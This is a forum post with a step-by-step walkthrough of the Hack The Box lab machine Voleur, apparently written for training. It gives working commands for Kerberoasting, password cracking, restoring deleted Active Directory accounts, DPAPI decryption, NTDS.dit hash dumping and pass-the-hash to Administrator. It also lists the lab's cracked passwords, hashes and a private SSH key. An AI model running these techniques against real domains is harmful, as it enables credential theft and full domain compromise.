HTB - VOLEUR.HTB - MEDIUM WINDOWS
by bitcoin - 07-07-25, 09:17 PM
DarkForums Members Offline
Members

Posts 9
Threads 4
Joined Jun 2025
Reputation 3
1 Months
#1
07-07-25, 09:17 PM
TARGET : VOLEUR.HTB,

I can provide my personal notes for the machine if anyone is interested.  5689_yesvote
 
Code:
IP: 10.10.11.76 Domain: voleur.htb DC: dc.voleur.htb

Krb5.conf
 
Code:
[libdefaults]
  default_realm = VOLEUR.HTB
  dns_lookup_realm = false
  dns_lookup_kdc = false

[realms]
  VOLEUR.HTB = {
    kdc = dc.voleur.htb
  }

[domain_realm]
  .voleur.htb = VOLEUR.HTB
  voleur.htb   = VOLEUR.HTB

Initial TGT generation - ryan.naylor
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/ryan.naylor:HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache

SMB enumeration
 
Code:
netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir ""
netexec smb enum DC.VOLEUR.HTB --use-kcache --share IT --dir "First-Line Support"

Download encrypted Excel file
 
Code:
netexec smb DC.VOLEUR.HTB --use-kcache --get-file "First-Line Support/Access_Review.xlsx" "./Access_Review.xlsx" --share IT

Crack Excel password
 
Code:
office2john Access_Review.xlsx > xlsx.h
john xlsx.h --wordlist=/usr/share/wordlists/rockyou.txt

Result:
 
Code:
football1

Decrypt and extract credentials
 
Code:
msoffcrypto-tool -p "football1" Access_Review.xlsx decrypted.xlsx
xlsx2csv decrypted.xlsx | sed -n '5p;12p;13p'

Extracted credentials:
 
Code:
Todd.Wolfe - Password was reset to NightT1meP1dg3on14 and account deleted
svc_ldap - P/W - M1XyC9pW7qT5Vn
svc_iis - P/W - N5pXyW1VqM7CZ8

Targeted Kerberoasting
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCNAME=svc_ldap.ccache
targetedKerberoast.py -v --dc-ip 10.10.11.76 --dc-host dc.VOLEUR.HTB -d "voleur.htb" -u "svc_ldap" -k --request-user svc_winrm -o kerberostable.txt

Extracted TGS hash:
 
Code:
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$cf6535bc0a95a2ed7b815852807efa4a$7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106

Crack TGS hash
 
Code:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt

Result:
 
Code:
svc_winrm:AFireInsidedeOzarctica980219afi

WinRM access
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=FILE:svc_winrm.ccache
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

Restore deleted user Todd.Wolfe
 
Code:
$cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))
Import-Module ActiveDirectory
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential $cred | Restore-ADObject -Credential $cred
Get-ADUser todd.wolfe

Access Todd.Wolfe SMB share
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb

use IT
cd Second-Line Support
cd Archived Users
cd todd.wolfe

DPAPI credential extraction
Found DPAPI protected credentials in AppData/Roaming/Microsoft/

Extract masterkey:
 
Code:
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"

Masterkey result:
 
Code:
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Decrypt credentials:
 
Code:
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

DPAPI result:
 
Code:
Username: jeremy.combs Password: qT3V9pLXyN7W4m

Jeremy.combs access
 
Code:
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'
export KRB5CCNAME=FILE:jeremy.combs.ccache


evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (work but useless)


KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb

SSH key discovery
Found in SMB share:

note.txt.txt:
 
Code:
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin

id_rsa:
Code:
 -----BEGIN OPENSSH PRIVATE KEY-----
    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
    -----END OPENSSH PRIVATE KEY-----

SSH access to svc_backup via WSL
 
Code:
chmod 400 id_rsa
ssh -p 2222 -i id_rsa svc_backup@voleur.htb

AD database extraction

Found in /mnt/c/IT/THIRD-LINE SUPPORT/:
 
Code:
./Active Directory: ntds.dit ntds.jfm
./registry: SECURITY SYSTEM
Extract NTLM hashes
 
Code:
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL

Administrator hash:
 
Code:
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Root access
 
Code:
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
export KRB5CCNAME=FILE:administrator.ccache
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Credentials summary
Code:
ryan.naylor:HollowOct31Nyt (Initial access)
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)
svc_ldap:M1XyC9pW7qT5Vn (Excel file)
svc_iis:N5pXyW1VqM7CZ8 (Excel file)
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)
Reply


Forum Jump:


 Users browsing this thread: 1 Guest(s)